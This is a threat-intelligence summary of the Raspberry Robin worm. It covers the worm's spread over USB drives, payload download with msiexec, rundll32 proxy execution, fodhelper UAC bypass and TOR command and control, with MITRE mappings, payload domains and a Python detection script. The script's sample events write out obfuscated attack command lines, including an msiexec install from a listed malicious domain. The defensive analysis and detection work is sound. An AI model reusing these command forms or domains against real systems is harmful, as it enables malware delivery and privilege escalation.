Raspberry Robin is a worm that spreads via infected external disks and downloads its payload through msiexec from QNAP cloud accounts, using TOR for its C2 channel. It executes payloads via system binaries (rundll32.exe, shell32.dll) and elevates with fodhelper.exe while evading detection through mixed-case names and whitespace. #RaspberryRobin #QNAPWorm #TOR #msiexec #fodhelper
Keypoints
- Raspberry Robin propagates by infecting external drives and delivering its payload from QNAP cloud accounts.
- Initial infection relies on .lnk files or similarly named files with obfuscated whitespace and mixed case to bypass detection.
- Payload download and execution occur via Windows binaries (msiexec, odbcconf, control.exe) invoked through rundll32.exe.
- Auto-elevation and UAC bypass are achieved using fodhelper.exe, enabling privileged execution of commands.
- The malware establishes a TOR-based C2 channel and leverages process injection and system binaries for command and control.
- Cisco Global Threat Alerts track Raspberry Robin under the RaspberryRobin threat object with documented detections.
MITRE Techniques
- [T1091] Replication Through Removable Media – Raspberry Robin spreads via an external drive. “Raspberry Robin is a worm that spreads over an external drive.”
- [T1059.003] Windows Command Shell – The malware uses cmd.exe to execute commands from the infected disk. “cmd.exe tries to execute commands from a file within that disk.”
- [T1105] Ingress Tool Transfer – It downloads its payload after initial execution via msiexec from a remote source. “After delivery and initial execution, cmd.exe spawns msiexec.exe to download the Raspberry Robin payload.”
- [T1218.005] Signed Binary Proxy Execution: Msiexec – The payload is executed through system binaries including msiexec.exe. “rundll32.exe uses the ShellExec_RunDLL function from shell32.dll to leverage system binaries such as msiexec.exe, odbcconf.exe, or control.exe.”
- [T1218.003] Regsvr32 – Uses regsvr32.exe as part of the command sequence to load components. “…/a {CONFIGSYSDSN wgdpb YNPMVSV} /A {CONFIGDSN…}”
- [T1548.002] Bypass User Account Control – fodhelper.exe is used for auto-elevated execution. “fodhelper.exe, which has the auto elevated bit set to true. It is often leveraged by adversaries in order to bypass User Account Control.”
- [T1071.001] Application Layer Protocol: Web Protocols – C2 channel is established through TOR connections. “establishes a command and control (C2) channel through TOR connections.”
- [T1055] Process Injection – The text suggests process injection given elevated privileges in earlier steps. “likely points to process injection given elevated privileges in previous steps of execution.”
- [T1027] Obfuscated/Compressed Files and Information – Obfuscation via whitespace and mixed case to evade detection. “excessive whitespace/non printable characters and changing letter case to avoid string matching detection techniques.”
- [T1036] Masquerading – Mixed-case and obfuscated naming used to blend with legitimate system activity. “On every instance of explorer.exe we see that the adversary is changing the letter case to avoid detection.”
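The keypoints and the technique list above describe an execution chain (cmd.exe reading a command file off the infected disk, msiexec fetching the payload from a URL, rundll32 proxying through shell32.dll!ShellExec_RunDLL into msiexec/odbcconf/control, then fodhelper.exe for auto-elevation) and two string-matching evasions (mixed case and excessive whitespace). The following is an added detection sketch written for this summary; it is not code from Cisco or from the original blog post. It normalizes process command lines before matching so the evasions do not defeat the rules, tags each event with the technique it indicates, and correlates the chain across events. The event field names, the parent-process list for the fodhelper rule, the known-binary set and all sample events are assumptions or constructed data; the k6j.pw domain in the sample is the one listed in the Indicators of Compromise section.

```python
import re

# Constructed sample process-creation events (synthetic, not real telemetry).
# Field names are assumed; map them to your EDR / Sysmon Event ID 1 schema.
SAMPLE_EVENTS = [
    {"id": 1, "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cMd.eXe   /R   tyPe   E:\\doc.lnk   |   cmd"},
    {"id": 2, "parent": "cmd.exe", "image": "msiexec.exe",
     "cmdline": "mSiExEc     /q    /i    http://k6j.pw/x"},          # domain from the IoC list
    {"id": 3, "parent": "msiexec.exe", "image": "rundll32.exe",
     "cmdline": "rundll32 shell32.dll,ShellExec_RunDLL odbcconf.exe /a {CONFIGSYSDSN wgdpb YNPMVSV}"},
    {"id": 4, "parent": "rundll32.exe", "image": "fodhelper.exe",   # parent is an assumption
     "cmdline": "fodhelper.exe"},
    {"id": 5, "parent": "services.exe", "image": "msiexec.exe",
     "cmdline": "C:\\Windows\\system32\\msiexec.exe /V"},            # benign service instance
    {"id": 6, "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\u\\notes.txt"},              # benign
]

# Binaries the post names, plus a few neighbours; used for the mixed-case check (assumed set).
KNOWN_BINARIES = {"cmd", "msiexec", "rundll32", "odbcconf", "control",
                  "fodhelper", "regsvr32", "explorer"}
LOLBIN_PROXIES = ("msiexec", "odbcconf", "control")
# Parents from which an auto-elevated fodhelper.exe is unexpected (assumed list, tune locally).
UAC_BYPASS_PARENTS = ("cmd.exe", "rundll32.exe", "powershell.exe", "wscript.exe", "cscript.exe")


def normalize_cmdline(cmdline: str) -> str:
    """Fold case, drop non-printable characters and collapse whitespace runs so the
    evasions described in the post (mixed case, padding) do not break string matching."""
    printable = "".join(ch for ch in cmdline if ch.isprintable())
    return re.sub(r"\s+", " ", printable).strip().lower()


def obfuscation_indicators(cmdline: str) -> list[str]:
    """Flag the cosmetic tricks themselves on the raw command line: whitespace runs,
    non-printable characters and mixed-case spellings of well-known executables."""
    found = []
    if re.search(r"\s{3,}", cmdline):
        found.append("excessive-whitespace")
    if any(not ch.isprintable() for ch in cmdline):
        found.append("non-printable-chars")
    for token in re.findall(r"[A-Za-z0-9_.]+", cmdline):
        base = token.lower().removesuffix(".exe")
        if base in KNOWN_BINARIES and token not in (token.lower(), token.upper(), token.capitalize()):
            found.append(f"mixed-case:{base}")
    return found


def evaluate(event: dict) -> list[str]:
    """Return MITRE technique tags triggered by one process-creation event."""
    hits = []
    image, parent = event["image"].lower(), event["parent"].lower()
    cmd = normalize_cmdline(event["cmdline"])
    obfuscated = obfuscation_indicators(event["cmdline"])

    # T1218.005 / T1105: msiexec installing from a URL rather than a local package path
    if image == "msiexec.exe" and re.search(r"https?://", cmd):
        hits.append("T1218.005:msiexec-remote-install")
    # T1218: rundll32 proxying through shell32!ShellExec_RunDLL into another system binary
    if image == "rundll32.exe" and "shellexec_rundll" in cmd and any(p in cmd for p in LOLBIN_PROXIES):
        hits.append("T1218:rundll32-shellexec-proxy")
    # T1548.002: auto-elevated fodhelper.exe launched from a scripting or proxy parent
    if image == "fodhelper.exe" and parent in UAC_BYPASS_PARENTS:
        hits.append("T1548.002:fodhelper-autoelevate")
    # T1059.003: cmd.exe reading commands from a .lnk-named file, with an obfuscated command line
    if image == "cmd.exe" and re.search(r"\.lnk\b", cmd) and obfuscated:
        hits.append("T1059.003:cmd-lnk-command-file")
    # T1027: the evasion itself is worth an alert regardless of which binary runs
    if obfuscated:
        hits.append("T1027:obfuscated-cmdline")
    return hits


def scan(events: list[dict]) -> dict:
    """Evaluate every event; returns {event id: [technique tags]}."""
    return {ev["id"]: evaluate(ev) for ev in events}


def chain_detected(events: list[dict]) -> bool:
    """Correlate across events: remote msiexec install, rundll32 proxy and fodhelper
    auto-elevation all present is the full chain the post describes."""
    seen = {tag.split(":")[0] for hits in scan(events).values() for tag in hits}
    return {"T1218.005", "T1218", "T1548.002"} <= seen


if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_EVENTS).items():
        print(event_id, hits or "-")
    print("full chain:", chain_detected(SAMPLE_EVENTS))
```

The per-event rules are deliberately loose (a single msiexec fetching from a URL is common in some environments); the value is in `chain_detected`, which only fires when the stages the post lays out appear together. Normalizing before matching is the key design choice: the post notes the adversary changes letter case and pads with whitespace precisely to break naive string matching, so rules should run over `normalize_cmdline` output while a separate indicator reports the padding itself.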
Indicators of Compromise
- [Domain] Payload Delivery – k6j.pw, kjaj.top, and other listed domains used for payload delivery
Read more: https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks